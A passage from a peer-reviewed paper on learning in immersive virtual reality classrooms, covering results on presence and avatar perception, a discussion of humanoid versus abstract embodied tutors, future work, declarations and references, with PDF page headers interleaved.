8.8, SD = 2.1). With respect to H3, an independent samples t-test revealed that these differences in learner motivation between conditions were not significantly different, t(22) = −1.316, p = 0.202, d = −0.537. However, Bayes statistics only indicate very Figure 3 Mean satisfaction and engagement scores with error bars representing SE, for the predictor of learning condition within immersive virtual environments (no tutor, humanoid tutor, abstract tutor). The real environment was not modelled as a condition in this analysis and therefore means for three conditions are shown. Error bars and dots as in Fig. 2. Full-size DOI: 10.7717/peerj-cs.315/fig-3 Fitton et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.315 11/22 http://dx.doi.org/10.7717/peerj-cs.315/fig-3 http://dx.doi.org/10.7717/peerj-cs.315 https://peerj.com/computer-science/ weak support for the null hypothesis in this case as it suggests that the null hypothesis is only one times more likely to explain the data (BF01 = 1.4). Virtual presence Virtual presence was measured using only a subset of Witmer and Singer’s presence questionnaire so measures of internal reliability were not conducted. Learner ratings of virtual presence were consistent across the different IVEs (no tutor M = 14.4, SD = 2.3; human tutor M = 14.7, SD = 2.5; abstract tutor M = 14.3, SD = 2.3). A Kruskal–Wallis test supported that virtual presence scores were not significantly different between the virtual reality learning conditions, H(2) = 0.066, p = 0.968, η2 = 0.001, furthermore Bayes statistics provide moderate support for the null (BF01 = 5). Learner perceptions of avatar In response to the question “Did you notice anything odd about the human avatar?” 58% of the participants in the IVE with the humanoid tutor reported that they did find the humanoid EA tutor strange. The reasons for answering ‘yes’ to the question were that the avatar had strange or repetitive movement, no changing facial expressions, and did not speak. DISCUSSION Previous research and educational applications of VR have focused on desktop-VR simulations for skills-based tasks (Freina & Ott, 2015), neglecting the use of more IVEs and their potential use for informational, lecture-styled learning experiences. Therefore, in this pilot study we investigated to what extent informational-learning within an IVE is effective compared to learning in a physical classroom. We created a virtual replica of a Figure 4 Results of a t-test conducted to analyse the impact of humanoid vs. abstract tutor representation on learner motivation scores, and therefore means for two conditions are shown. Error bars and dots as in Fig. 2. Full-size DOI: 10.7717/peerj-cs.315/fig-4 Fitton et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.315 12/22 http://dx.doi.org/10.7717/peerj-cs.315/fig-4 http://dx.doi.org/10.7717/peerj-cs.315 https://peerj.com/computer-science/ classroom and compared its use for informational learning to the traditional, real-world classroom. Previous literature indicated that simulated learning environments are highly effective, enhance declarative knowledge, and lead to better retention compared to conventional learning methods (Graesser et al., 2005; Merchant et al., 2014; Sitzmann, 2011). While desktop-VR has dominated the literature, it is argued that more immersive experiences may lead to even greater results (Psotka, 1995). Therefore, we hypothesised that participants who learned virtually would outperform participants who learned non-virtually (H1). However, results demonstrated that participants who learned virtually did not outperform participants who learned non-virtually. A BF analysis provides moderate support for this finding as it suggests that the data are six times more likely to be explained by the null hypothesis. It is plausible that familiarity with learning material, which is known to impact learner engagement, performance, and motivation (Schönwetter, Clifton & Perry, 2002), would have impacted our results: to combat this effect we used fabricated information to eliminate prior knowledge as a confounding variable. Thus our findings are robust, indicating there is no detriment to learning in an IVE compared to a conventional classroom setting (Madden et al., 2020). The lack of a statistically significant difference in learner performance between the IVE and the non-virtual classroom is of particular importance as educational institutions are under increasing pressure to cater for large numbers of students, and as such require effective distance learning applications (Kauffman, 2015). Current distance learning platforms suffer from poor student engagement and high levels of drop-out (Yang et al., 2013), however, IVEs have the potential to improve this. Previous research has demonstrated that IVEs provide a more engaging platform for distance learners than existing video-based applications (Tsaramirsis et al., 2016). In light of the COVID-19 pandemic and its impact on the higher education sector, namely creating situations where many institutions have closed their campus until further notice, IVEs may yield a better experience for distance learners. Furthermore, our research supports that distance learning applications would benefit from incorporating the use of IVEs, as distance-learner performance would be consistent with learners in traditional settings, yet IVEs can be used on a much larger scale, making them highly cost-efficient. The role of embodied agents Few studies have been conducted which inform how the design and use of EA tutors impacts the learner experience (Moro, Stromberga & Stirling, 2017), so we investigated the role of EA tutors within IVEs. We manipulated the tutor in the IVE on two dimensions; its presence or absence, and its human-like representation. Previous research has suggested that co-presence influences the learning experience, with higher feelings of co-presence resulting in greater learning performance (Roussou, Oliver & Slater, 2006; Wise et al., 2004). Therefore, we hypothesised that participants who learn in the presence of an EA tutor will outperform participants who learn in its absence. We found no statistically significant difference in performance of learners who learned without a virtual tutor, with a humanoid tutor, or with an abstract tutor. Participants who Fitton et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.315 13/22 http://dx.doi.org/10.7717/peerj-cs.315 https://peerj.com/computer-science/ learned in the IVE without an EA tutor were expected to perform worse on the post-learning test. Our findings fit into current discourse and debate on the utility of EAs and their impact on learning: while some research has concluded no impact on performance, consistent with ours (Sträfling et al., 2010), other research has found that EAs do impact learning performance (Baylor Amy, 2009; Maldonado & Nass, 2007; Rosenberg-Kima et al., 2007). One explanation for our results is the age of participants in our study. Previous research in agreement with our results used young adults (Sträfling et al., 2010), while others have recruited young school children (Roussou, Oliver & Slater, 2006). The presence of virtual avatars is known to positively impact learning in young children (Darves, Oviatt & Coulston, 2002) and it is possible that the positive impact of EA tutors on learner performance may be confined to when IVEs are used by younger students (Baylor & Kim, 2004; Ashby Plant et al., 2009). Embodied Agent tutors impact learner satisfaction and engagement within IVEs by simulating the relationship between student and tutor (Alseid & Rigas, 2010). A learner’s social judgement of interactions with an EA impacts perceived co-presence and satisfaction, with human-like representations regarded as more social than non-human avatars (Nowak, 2004). Therefore, we hypothesised that a humanoid EA tutor would be preferred over an abstract EA. However, our results show no statistically significant differences in learner satisfaction and engagement when comparing the IVE with no tutor, the humanoid tutor, or the abstract tutor. BF analysis indicates that the data were four times more likely to be explained by the null hypothesis in this instance and therefore can be accepted with moderate confidence (Wagenmakers et al., 2018). Although measures were taken to provide the humanoid tutor with a realistic appearance and behaviour, such as using deictic gestures and a natural human voice (Atkinson, Mayer & Merrill, 2005; Baylor, 2011; Baylor & Ryu, 2003; Janse, 2002), the avatar was not equipped with any animations which replicated changing facial expressions. This may have hindered the level of satisfaction and engagement the humanoid tutor was able to evoke in the learners, which is known to influence perceived realism (Atkinson, 2002). In our study, many participants exposed to the humanoid tutor commented on the absence of facial expression, with the majority of participants feeling as though it had ‘strange’ and ‘repetitive movement’. In contrast, participants did not have pre-defined expectations of how the abstract tutor should behave and as such it was not susceptible to the uncanny valley effect, unlike the humanoid avatar (Bailenson et al., 2005; Mori, 1970). Therefore, rather than the humanoid tutor increasing motivation, participants may have found the abstract tutor more appealing. This mismatch between learner expectations of the tutor and reality may have been detrimental to the perceived co- presence (Bailenson et al., 2005). Therefore, it is possible that a lack of emotional expression in the humanoid avatar contributed to the absence of significantly greater learner satisfaction and engagement. Previous research has indicated that EA tutors affect learning outcomes indirectly by influencing learner motivation (Baylor, 2011). Research suggests greater likeability, and ascribed intelligence when using a humanoid EA tutor (King & Ohya, 1996; Fitton et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.315 14/22 http://dx.doi.org/10.7717/peerj-cs.315 https://peerj.com/computer-science/ Lester & Stone, 1997); therefore, we expected the humanoid tutor would increase levels of learner motivation. However, there was no statistically significant difference in learner motivation between the humanoid and abstract tutor groups immersed in the VLE. BF analysis suggests that the data are almost equally likely to be explained by either the null or the alternative hypothesis. Thus, we do not rule out the possibility that tutor appearance can affect motivation. A distinct strength of our study is the control for immersion as a factor which could influence the efficacy of IVEs, as the more immersive the environment the more comparable it is thought to be to real-world environments. To determine if learning outcomes are affected by immersion a virtual-presence questionnaire was used. The results indicated similarly high levels of immersion in all three IVEs, meaning that the IVEs are comparable to non-virtual learning (Peperkorn, Diemer & Mühlberger, 2015; Shin, 2018) and ensuring that environment quality was unlikely to produce any differences in learning outcomes. Future work While this pilot study provides preliminary support for the use of IVEs by demonstrating that learning within an IVE is not significantly different to non-virtual learning, this is only demonstrated in the immediate short-term as the test and outcome measures were administered immediately after the learning experience. For effective distance learning applications, long-term outcomes need to be assessed, perhaps in the realm of a longitudinal study. Future work should consider incorporating additional follow-up assessment periods, in order to provide evidence for whether the performance outcomes observed in the IVE and the non-virtual classroom are maintained over a longer period of time. In this preliminary study recruitment was restricted to the student population at the university, however it is likely that large differences in learning styles and ability will vary within this population resulting in a large range of scores in all conditions. Future studies using a larger sample-size should consider the prior grades of all participants, and use random allocation to minimise the effects of individual differences. Additionally, the present study highlights the need for further investigation into the impact of EAs in IVEs to understand the varying results surrounding their impact on learner performance, motivation, and satisfaction. Previous work has highlighted the impact of graphical realism on peoples’ perceptions of avatars in virtual environments while engaging in various tasks in various scenarios (Tessier et al., 2019; Kang, Watt & Ala, 2008; Lugrin et al., 2015). Our goal was to assess the importance of a humanoid avatar, not necessarily the physical realisation of said avatar. Future work may consider graphical fidelity and realism as a factor in learner motivation, presence, and satisfaction and engagement with the learning experience. A possible trend in the literature is based around the age of participants, with younger participants seemingly more likely to be influenced by the presence of an EA. Future research should seek to investigate this theory. Fitton et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.315 15/22 http://dx.doi.org/10.7717/peerj-cs.315 https://peerj.com/computer-science/ In the present study there was no verbal interaction allowed between participants and the tutor in all learning conditions in order to remove the likelihood of differing levels of social interaction between participants and the tutor becoming a confounding variable. Furthermore, the EA was not equipped with any facial animation to replicate changing expression, both of which likely had a negative impact on the perceived realism. Future work investigating learner satisfaction, engagement, and motivation should consider introducing EAs with changing expressions and allow verbal interaction, such as the ability to ask the tutor questions, as this may better simulate student-tutor relationships and have a greater impact upon perceived co-presence, producing more insightful results regarding the role of EA tutors within IVEs. It may also reduce the strangeness reported in “Discussion” as the avatar’s behaviour is improved. Finally, we highlight a novel avenue for future research: whether the influence of an EA on learning outcomes are mediated by their relevance to the learning material itself. In our study, participants studied fabricated information about an alien species, hence the abstract tutor may be more salient in this context, promoting interest in the learning material to a greater extent than the humanoid tutor (Maldonado & Nass, 2007). Future work will assess the link between learning material and the EA tutor’s appearance, as well as its contextual relevance and form within the IVE. CONCLUSIONS To the best of our knowledge, this pilot study is the first to directly compare informational- learning in a traditional classroom to a virtual replica using immersive VR for groups of participants in a controlled, laboratory setting. Our findings suggest that learner performance is equivalent in both learning situations. It remains unclear how the design of the IVE might impact learning outcomes, in particular whether the presence and appearance of the virtual tutor plays a role in learning outcomes. We have discussed avenues for future work, building on our preliminary study and exploring other factors which may impact learning performance in IVEs as well as guidelines and recommendations for how to design future experiments which control for extraneous variables. There are important implications for developers of distance learning applications: by providing IVEs opposed to video-based applications, it is possible to reduce the issues with current distance learning platforms and achieve comparable performance levels with those who learn in a traditional classroom, making it possible to cater for increasing numbers of students. As academic and corporate education moves towards IVEs under increasing pressure to meet the demands of growing numbers of students (Kauffman, 2015), the scalability and significant financial incentives they provide while maintaining satisfactory learning outcomes make them an attractive alternative to current video-based distance learning platforms. In addition, the COVID-19 pandemic has also forced institutions to rethink their ability to provide effective blended learning and virtual learning environments for students. IVE technology can help to create effective learning environments that are safe for staff and students, and continue to provide high quality learning and teaching. Fitton et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.315 16/22 http://dx.doi.org/10.7717/peerj-cs.315 https://peerj.com/computer-science/ ADDITIONAL INFORMATION AND DECLARATIONS Funding Isabel S. Fitton’s research is supported in part by the UKRI EPSRC Centre for Doctoral Training in Digital Entertainment (CDE), EP/L016540/1. Daniel J. Finnegan thanks the School of Computer Science & Informatics at Cardiff University for their continued support. Michael J. Proulx is a member of the REal and Virtual Environments Augmentation Labs (ReVEaL) Research Centre, the UKRI Centre for the Analysis of Motion, Entertainment Research and Applications 2.0 (EP/T014865/1), and the UKRI Centre for Doctoral Training in ART-AI in Computer Science at the University of Bath. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: UKRI EPSRC Centres: EP/L016540/1 and EP/T014865/1. School of Computer Science & Informatics at Cardiff University. REal and Virtual Environments Augmentation Labs (ReVEaL) Research Centre. Competing Interests The authors declare that they have no competing interests. Author Contributions � Isabel S. Fitton conceived and designed the experiments, performed the experiments, analysed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � Daniel J. Finnegan conceived and designed the experiments, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � Michael J. Proulx conceived and designed the experiments, authored or reviewed drafts of the paper, and approved the final draft. Ethics The following information was supplied relating to ethical approvals (i.e., approving body and any reference numbers): The University of Bath Psychology Research Ethics Committee granted approval to carry out this study (Approval number 17-292). Data Availability The following information was supplied regarding data availability: The raw data is available in the Supplemental Files. Fitton et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.315 17/22 http://dx.doi.org/10.7717/peerj-cs.315#supplemental-information http://dx.doi.org/10.7717/peerj-cs.315 https://peerj.com/computer-science/ Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.315#supplemental-information. REFERENCES Alseid M, Rigas D. 2010. Three different modes of avatars as virtual lecturers in e-learning interfaces: a comparative usability study. Open Virtual Reality Journal 2(1):8–17 DOI 10.2174/1875323X01002010008. Ashby Plant E, Baylor AL, Doerr CE, Rosenberg-Kima RB. 2009. Changing middle-school students’ attitudes and performance regarding engineering with computer-based social models. Computers & Education 53(2):209–215 DOI 10.1016/j.compedu.2009.01.013. Atkinson R. 2002. Optimizing learning from examples using animated pedagogical agents. Journal of Educational Psychology 94(2):416–427 DOI 10.1037/0022-0663.94.2.416. Atkinson RK, Mayer RE, Merrill MM. 2005. Fostering social agency in multimedia learning: examining the impact of an animated agent’s voice. Contemporary Educational Psychology 30(1):117–139 DOI 10.1016/j.cedpsych.2004.07.001. Bailenson JN, Swinth K, Hoyt C, Persky S, Dimov A, Blascovich J. 2005. The independent and interactive effects of embodied-agent appearance and behavior on self-report, cognitive, and behavioral markers of copresence in immersive virtual environments. Presence: Teleoperators and Virtual Environments 14(4):379–393 DOI 10.1162/105474605774785235. Baylor AL. 2011. The design of motivational agents and avatars. Educational Technology Research and Development 59(2):291–300 DOI 10.1007/s11423-011-9196-3. Baylor AL, Kim S. 2009. Designing nonverbal communication for pedagogical agents: when less is more. Computers in Human Behavior 25(2):450–457 DOI 10.1016/j.chb.2008.10.008. Baylor AL, Kim Y. 2004. Pedagogical agent design: the impact of agent realism, gender, ethnicity, and instructional role. In: Lester JC, Vicari RM, Paraguaçu F, eds. Intelligent Tutoring Systems, Lecture Notes in Computer Science. Berlin Heidelberg: Springer, 592–603. Baylor AL, Ryu J. 2003. The effects of image and animation in enhancing pedagogical agent persona. Journal of Educational Computing Research 28(4):373–394 DOI 10.2190/V0WQ-NWGN-JB54-FAT4. Baylor Amy L. 2009. Promoting motivation with virtual agents and avatars: role of visual presence and appearance. Philosophical Transactions of the Royal Society B: Biological Sciences 364(1535):3559–3565 DOI 10.1098/rstb.2009.0148. Bush M. 2001. A multiple choice test that rewards partial knowledge. Journal of Further and Higher Education 25(2):157–163 DOI 10.1080/03098770120050828. Caro V, Carter B, Dagli S, Schissler M, Millunchick J. 2018. Can virtual reality enhance learning: a case study in materials science. In: 2018 IEEE Frontiers in Education Conference (FIE), 1–4. Chen S. 2018. Research on the application of virtual reality in remote education based on the example of MOOC. In: 2018 15th International Conference on Service Systems and Service Management (ICSSSM), 1–4. Clow D. 2013. MOOCs and the funnel of participation. In: Proceedings of the Third International Conference on Learning Analytics and Knowledge, LAK ’13, New York: ACM, 185–189. Crook C, Schofield L. 2017. The video lecture. Internet and Higher Education 34:56–64 DOI 10.1016/j.iheduc.2017.05.003. Fitton et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.315 18/22 http://dx.doi.org/10.7717/peerj-cs.315#supplemental-information http://dx.doi.org/10.7717/peerj-cs.315#supplemental-information http://dx.doi.org/10.2174/1875323X01002010008 http://dx.doi.org/10.1016/j.compedu.2009.01.013 http://dx.doi.org/10.1037/0022-0663.94.2.416 http://dx.doi.org/10.1016/j.cedpsych.2004.07.001 http://dx.doi.org/10.1162/105474605774785235 http://dx.doi.org/10.1007/s11423-011-9196-3 http://dx.doi.org/10.1016/j.chb.2008.10.008 http://dx.doi.org/10.2190/V0WQ-NWGN-JB54-FAT4 http://dx.doi.org/10.1098/rstb.2009.0148 http://dx.doi.org/10.1080/03098770120050828 http://dx.doi.org/10.1016/j.iheduc.2017.05.003 http://dx.doi.org/10.7717/peerj-cs.315 https://peerj.com/computer-science/ Darves C, Oviatt S, Coulston R. 2002. The impact of auditory embodiment on animated character design. In: Proceedings of the International Joint Conference on Autonomous Agents and Multi-agent Systems, Embodied Agents Workshop. Davies P. 2002. There’s no confidence in multiple-choice testing. Loughborough University. Available at https://repository.lboro.ac.uk/articles/_There_s_no_Confidence_in_Multiple- Choice_Testing__/9490067 (accessed 3 November 2020). Didehbani N, Allen T, Kandalaft M, Krawczyk D, Chapman S. 2016. Virtual reality social cognition training for children with high functioning autism. Computers in Human Behavior 62:703–711 DOI 10.1016/j.chb.2016.04.033. Dienes Z. 2011. Bayesian versus orthodox statistics: which side are you on? Perspectives on Psychological Science 6(3):274–290 DOI 10.1177/1745691611406920. Faul F, Erdfelder E, Lang A-G, Buchner A. 2007. G*Power 3: a flexible statistical power analysis program for the social, behavioral, and biomedical sciences. Behavior Research Methods 39(2):175–191 DOI 10.3758/BF03193146. Feng Y, Chen D, Zhao Z, Chen H, Xi P. 2015. The impact of students and TAs’ participation on students’ academic performance in MOOC. In: Proceedings of the 2015 IEEE/ACM International Conference on Advances in Social Networks Analysis and Mining 2015, ASONAM ’15, New York: ACM, 1149–1154. Freina L, Ott M. 2015. A literature review on immersive virtual reality in education: state of the art and perspectives. In: eLearning and Software for Education (eLSE)Bucharest, . Freitas A, Paredes J. 2018. Understanding the faculty perspectives influencing their innovative practices in MOOCs/SPOCs: a case study. International Journal of Educational Technology in Higher Education 15(1):5 DOI 10.1186/s41239-017-0086-6. Graesser AC, Chipman P, Haynes BC, Olney A. 2005. AutoTutor: an intelligent tutoring system with mixed-initiative dialogue. IEEE Transactions on Education 48(4):612–618 DOI 10.1109/TE.2005.856149. Greenwald SW, Kulik A, Kunert A, Beck S, Fröhlich B, Cobb S, Parsons S, Newbutt N, Gouveia C, Cook C, Snyder A, Payne S, Holland J, Buessing S, Fields G, Corning W, Lee V, Xia L, Maes P. 2017. Technology and applications for collaborative learning in virtual reality. In: Making a Difference: Prioritizing Equity and Access in CSCL, 12th International Conference on Computer Supported Collaborative Learning (CSCL), 719–726. Hasegawa D, Uğurlu Y, Sakuta H. 2014. A human-like embodied agent learning tour guide for e-learning systems. In: 2014 IEEE Global Engineering Education Conference (EDUCON), 50–53. Hecke TV. 2012. Power study of anova versus Kruskal-Wallis test. Journal of Statistics and Management Systems 15(2–3):241–247 DOI 10.1080/09720510.2012.10701623. Heeter C. 1992. Being there: the subjective experience of presence. Presence: Teleoperators and Virtual Environments 1(2):262–271 DOI 10.1162/pres.1992.1.2.262. Janse E. 2002. Time-compressing natural and synthetic speech. In: Proceedings of the 7th International Conference on Spoken Language Processing. Jarosz A, Wiley J. 2014. What are the odds? A practical guide to computing and reporting Bayes factors. Journal of Problem Solving 7(1):2–9. Johnson WL, Rickel J. 1997. Steve: an animated pedagogical agent for procedural training in virtual environments. ACM SIGART Bulletin 8(1–4):16–21 DOI 10.1145/272874.272877. Joo YJ, So H-J, Kim NH. 2018. Examination of relationships among students’ self-determination, technology acceptance, satisfaction, and continuance intention to use K-MOOCs. Computers & Education 122:260–272 DOI 10.1016/j.compedu.2018.01.003. Fitton et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.315 19/22 https://repository.lboro.ac.uk/articles/_There_s_no_Confidence_in_Multiple-Choice_Testing__/9490067 https://repository.lboro.ac.uk/articles/_There_s_no_Confidence_in_Multiple-Choice_Testing__/9490067 http://dx.doi.org/10.1016/j.chb.2016.04.033 http://dx.doi.org/10.1177/1745691611406920 http://dx.doi.org/10.3758/BF03193146 http://dx.doi.org/10.1186/s41239-017-0086-6 http://dx.doi.org/10.1109/TE.2005.856149 http://dx.doi.org/10.1080/09720510.2012.10701623 http://dx.doi.org/10.1162/pres.1992.1.2.262 http://dx.doi.org/10.1145/272874.272877 http://dx.doi.org/10.1016/j.compedu.2018.01.003 http://dx.doi.org/10.7717/peerj-cs.315 https://peerj.com/computer-science/ Kang S-H, Watt JH, Ala SK. 2008. Communicators’ perceptions of social presence as a function of avatar realism in small display mobile communication devices. In: Proceedings of the 41st Annual Hawaii International Conference on System Sciences (HICSS 2008), 147. Kaplan AM, Haenlein M. 2016. Higher education and the digital revolution: about MOOCs, SPOCs, social media, and the cookie monster. Business Horizons 59(4):441–450 DOI 10.1016/j.bushor.2016.03.008. Kauffman H. 2015. A review of predictive factors of student success in and satisfaction with online learning—ALT open access repository. Research in Learning Technology 23:26507 DOI 10.3402/rlt.v23.26507. King WJ, Ohya J. 1996. The representation of agents: anthropomorphism, agency, and intelligence. In: Conference Companion on Human Factors in Computing Systems, CHI ’96, New York: ACM, 289–290. Korallo L. 2010. Use of virtual reality environments to improve the learning of historical chronology. PhD thesis. Middlesex University, Hendon, London, UK. Lessick S, Kraft M. 2017. Facing reality: the growth of virtual reality and health sciences libraries. Journal of the Medical Library Association 105(4):407–417 DOI 10.5195/JMLA.2017.329. Lester JC, Stone BA. 1997. Increasing believability in animated pedagogical agents. In: Proceedings of the First International Conference on Autonmous Agents, New York: Association for Computing Machinery, Vol. 5. Lester JC, Stone BA, Stelling GD. 1999. Lifelike pedagogical agents for mixed-initiative problem solving in constructivist learning environments. User Modeling and User-Adapted Interaction 9(1):1–44 DOI 10.1023/A:1008374607830. Lin L, Parmar D, Babu SV, Leonard AE, Daily SB, Jörg S. 2017. How character customization affects learning in computational thinking. In: Proceedings of the ACM Symposium on Applied Perception, SAP ’17, New York: ACM, 1:1–1:8. Lugrin J-L, Wiedemann M, Bieberstein D, Latoschik ME. 2015. Influence of avatar realism on stressful situation in VR. In: 2015 IEEE Virtual Reality (VR), 227–228. Madden J, Pandita S, Schuldt JP, Kim B, Won AS, Holmes NG. 2020. Ready student one: exploring the predictors of student learning in virtual reality. PLOS ONE 15(3):e0229788 DOI 10.1371/journal.pone.0229788. Maldonado H, Nass C. 2007. Emotive characters can make learning more productive and enjoyable: it takes two to learn to tango. Educational Technology 47(1):33–38. Martha ASD, Santoso HB. 2019. The design and impact of the pedagogical agent: a systematic literature review. Journal of Educators Online 16(1):15. Merchant Z, Goetz ET, Cifuentes L, Keeney-Kennicutt W, Davis TJ. 2014. Effectiveness of virtual reality-based instruction on students’ learning outcomes in K-12 and higher education: a meta- analysis. Computers & Education 70:29–40 DOI 10.1016/j.compedu.2013.07.033. Misbhauddin M. 2018. VREdu: a framework for interactive immersive lectures using virtual reality. In: 2018 21st Saudi Computer Society National Computer Conference (NCC), 1–6. Mori M. 1970. On the uncanny valley. Energy 7(4):33–35. Moro C, Stromberga Z, Stirling A. 2017. Virtualisation devices for student learning: comparison between desktop-based (Oculus Rift) and mobile-based (Gear VR) virtual reality in medical and health science education. Australasian Journal of Educational Technology 33(6):10 DOI 10.14742/ajet.3840. Fitton et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.315 20/22 http://dx.doi.org/10.1016/j.bushor.2016.03.008 http://dx.doi.org/10.3402/rlt.v23.26507 http://dx.doi.org/10.5195/JMLA.2017.329 http://dx.doi.org/10.1023/A:1008374607830 http://dx.doi.org/10.1371/journal.pone.0229788 http://dx.doi.org/10.1016/j.compedu.2013.07.033 http://dx.doi.org/10.14742/ajet.3840 http://dx.doi.org/10.7717/peerj-cs.315 https://peerj.com/computer-science/ Nemer D, O’Neill J. 2019. Rethinking MOOCs: the promises for better education in India. International Journal of Information Communication Technologies and Human Development 11(1):36–50. Novick D, Afravi M, Camacho A, Rodriguez A, Hinojos L. 2019. Pedagogical-agent learning companions in a virtual reality educational experience. In: Zaphiris P, Ioannou A, eds. Learning and Collaboration Technologies. Ubiquitous and Virtual Environments for Learning and Collaboration, Lecture Notes in Computer Science. Cham: Springer International Publishing, 193–203. Nowak KL. 2004. The influence of anthropomorphism and agency on social judgment in virtual environments. Journal of Computer: Mediated Communication 9(2) DOI 10.1111/j.1083-6101.2004.tb00284.x. Peperkorn HM, Diemer J, Mühlberger A. 2015. Temporal dynamics in the relation between presence and fear in virtual reality. Computers in Human Behavior 48:542–547 DOI 10.1016/j.chb.2015.02.028. Pirker J, Lesjak I, Parger M, Gütl C. 2018. An educational physics laboratory in mobile versus room scale virtual reality: a comparative study. In: Auer ME, Zutin DG, eds. Online Engineering & Internet of Things, Lecture Notes in Networks and Systems. New York: Springer International Publishing, 1029–1043. Psotka J. 1995. Immersive training systems: virtual reality and education and training. Instructional Science 23(5):405–431 DOI 10.1007/BF00896880. Rajeswaran P, Hung N, Kesavadas T, Vozenilek J, Kumar P. 2018. AirwayVR: learning endotracheal intubation in virtual reality. In: 2018 IEEE Conference on Virtual Reality and 3D User Interfaces (VR), 669–670. Rosé CP, Carlson R, Yang D, Wen M, Resnick L, Goldman P, Sherer J. 2014. Social factors that contribute to attrition in MOOCs. In: Proceedings of the First ACM Conference on Learning @ Scale Conference—L@S ’14, Atlanta: ACM Press, 197–198. Rosenberg-Kima RB, Baylor AL, Plant EA, Doerr CE. 2007. The importance of interface agent visual presence: voice alone is less effective in impacting young women’s attitudes toward engineering. In: De Kort Y, IJsselsteijn W, Midden C, Eggen B, Fogg BJ, eds. Persuasive Technology, Lecture Notes in Computer Science. Berlin Heidelberg: Springer, 214–222. Roussou M, Oliver M, Slater M. 2006. The virtual playground: an educational virtual reality environment for evaluating interactivity and conceptual learning. Virtual Reality 10(3):227–240 DOI 10.1007/s10055-006-0035-5. Scaife M, Rogers Y. 2001. Informing the design of a virtual environment to support learning in children. International Journal of Human: Computer Studies 55(2):115–143 DOI 10.1006/ijhc.2001.0473. Schönwetter DJ, Clifton RA, Perry RP. 2002. Content familiarity: differential impact of effective teaching on student achievement outcomes. Research in Higher Education 43(6):625–655 DOI 10.1023/A:1020999014875. Schrader C, Bastiaens T. 2012. Learning in educational computer games for novices: the impact of support provision types on virtual presence, cognitive load, and learning outcomes. International Review of Research in Open and Distributed Learning 13(3):206–227 DOI 10.19173/irrodl.v13i3.1166. Schut MJ, Van der Stoep N, Fabius JH, Van der Stigchel S. 2018. Feature integration is unaffected by saccade landing point, even when saccades land outside of the range of regular oculomotor variance. Journal of Vision 18(7):6 DOI 10.1167/18.7.6. Fitton et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.315 21/22 http://dx.doi.org/10.1111/j.1083-6101.2004.tb00284.x http://dx.doi.org/10.1016/j.chb.2015.02.028 http://dx.doi.org/10.1007/BF00896880 http://dx.doi.org/10.1007/s10055-006-0035-5 http://dx.doi.org/10.1006/ijhc.2001.0473 http://dx.doi.org/10.1023/A:1020999014875 http://dx.doi.org/10.19173/irrodl.v13i3.1166 http://dx.doi.org/10.1167/18.7.6 http://dx.doi.org/10.7717/peerj-cs.315 https://peerj.com/computer-science/ Shin D. 2018. Empathy and embodied experience in virtual environment: to what extent can virtual reality stimulate empathy and embodied experience? Computers in Human Behavior 78:64–73 DOI 10.1016/j.chb.2017.09.012. Short J, Williams E, Christie B. 1976. The social psychology of telecommunications. Hoboken: John Wiley & Sons. Sitzmann T. 2011. A meta-analytic examination of the instructional effectiveness of computer- based simulation games. Personnel Psychology 64(2):489–528 DOI 10.1111/j.1744-6570.2011.01190.x. Sneddon J, Barlow G, Bradley S, Brink A, Chandy SJ, Nathwani D. 2018. Development and impact of a massive open online course (MOOC) for antimicrobial stewardship. Journal of Antimicrobial Chemotherapy 73(4):1091–1097 DOI 10.1093/jac/dkx493. Soliman M, Guetl C. 2010. Intelligent pedagogical agents in immersive virtual learning environments: a review. In: The 33rd International Convention MIPRO, 827–832. Sträfling N, Fleischer I, Polzer C, Leutner D, Krämer NC. 2010. Teaching learning strategies with a pedagogical agent. Journal of Media Psychology 22(2):73–83 DOI 10.1027/1864-1105/a000010. Tessier M-H, Gingras C, Robitaille N, Jackson PL. 2019. Toward dynamic pain expressions in avatars: perceived realism and pain level of different action unit orders. Computers in Human Behavior 96:95–109 DOI 10.1016/j.chb.2019.02.001. Tsaramirsis G, Buhari SM, Al-Shammari KO, Ghazi S, Nazmudeen MS, Tsaramirsis K. 2016. Towards simulation of the classroom learning experience: virtual reality approach. In: 2016 3rd International Conference on Computing for Sustainable Global Development (INDIACom), 1343–1346. Wagenmakers E-J, Love J, Marsman M, Jamil T, Ly A, Verhagen J, Selker R, Gronau QF, Dropmann D, Boutin B, Meerhoff F, Knight P, Raj A, Van Kesteren E-J, Van Doorn J, Šmíra M, Epskamp S, Etz A, Matzke D, De Jong T, Van den Bergh D, Sarafoglou A, Steingroever H, Derks K, Rouder JN, Morey RD. 2018. Bayesian inference for psychology. Part II: example applications with JASP. Psychonomic Bulletin & Review 25(1):58–76 DOI 10.3758/s13423-017-1323-7. Wise A, Chang J, Duffy T, Del Valle R. 2004. The effects of teacher social presence on student satisfaction, engagement, and learning. Journal of Educational Computing Research 31(3):247–271 DOI 10.2190/V0LB-1M37-RNR8-Y2U1. Witmer BG, Singer MJ. 1998. Measuring presence in virtual environments: a presence questionnaire. Presence: Teleoperators and Virtual Environments 7(3):225–240 DOI 10.1162/105474698565686. Yang D, Sinha T, Adamson D, Penstein Rose C. 2013. Turn on, tune in, drop out: anticipating student dropouts in massive open online courses. In: Proceedings of the 2013 NIPS Data-Driven Education Workshop. Vol. 11. Fitton et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.315 22/22 http://dx.doi.org/10.1016/j.chb.2017.09.012 http://dx.doi.org/10.1111/j.1744-6570.2011.01190.x http://dx.doi.org/10.1093/jac/dkx493 http://dx.doi.org/10.1027/1864-1105/a000010 http://dx.doi.org/10.1016/j.chb.2019.02.001 